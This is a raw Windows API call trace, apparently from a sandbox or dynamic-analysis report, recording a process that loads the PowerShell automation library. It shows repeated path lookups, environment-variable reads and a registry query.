	[0089.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e48c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.406] GetLastError () returned 0xcb
	[0089.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.406] GetLastError () returned 0xcb
	[0089.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.406] GetLastError () returned 0xcb
	[0089.406] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.406] GetLastError () returned 0xcb
	[0089.406] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.406] GetLastError () returned 0xcb
	[0089.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e48c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.406] GetLastError () returned 0xcb
	[0089.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.406] GetLastError () returned 0xcb
	[0089.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e48c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e48c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.407] GetCurrentProcessId () returned 0x3ac
	[0089.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e48c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.407] GetLastError () returned 0xcb
	[0089.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.408] GetLastError () returned 0xcb
	[0089.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.408] GetLastError () returned 0xcb
	[0089.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.408] GetLastError () returned 0xcb
	[0089.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.408] GetLastError () returned 0xcb
	[0089.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.408] GetLastError () returned 0xcb
	[0089.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e48c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.408] GetLastError () returned 0xcb
	[0089.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.408] GetLastError () returned 0xcb
	[0089.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.408] GetLastError () returned 0xcb
	[0089.408] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e99c | out: phkResult=0x14e99c*=0x2cc) returned 0x0
	[0089.408] RegQueryValueExW (in: hKey=0x2cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9e4, lpData=0x0, lpcbData=0x14e9e0*=0x0 | out: lpType=0x14e9e4*=0x1, lpData=0x0, lpcbData=0x14e9e0*=0x56) returned 0x0
	[0089.409] RegQueryValueExW (in: hKey=0x2cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9e4, lpData=0x361778, lpcbData=0x14e9e0*=0x56 | out: lpType=0x14e9e4*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9e0*=0x56) returned 0x0
	[0089.409] RegCloseKey (hKey=0x2cc) returned 0x0
	[0089.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e48c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.409] GetLastError () returned 0xcb
	[0089.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.409] GetLastError () returned 0xcb
	[0089.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.409] GetLastError () returned 0xcb
	[0089.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.409] GetLastError () returned 0xcb
	[0089.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e424, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.409] GetLastError () returned 0xcb
	[0089.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e424, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.410] GetLastError () returned 0xcb
	[0089.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.416] GetLastError () returned 0xcb
	[0089.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.416] GetLastError () returned 0xcb
	[0089.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.416] GetLastError () returned 0xcb
	[0089.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.416] GetLastError () returned 0xcb
	[0089.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.416] GetLastError () returned 0xcb
	[0089.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.416] GetLastError () returned 0xcb
	[0089.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.417] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
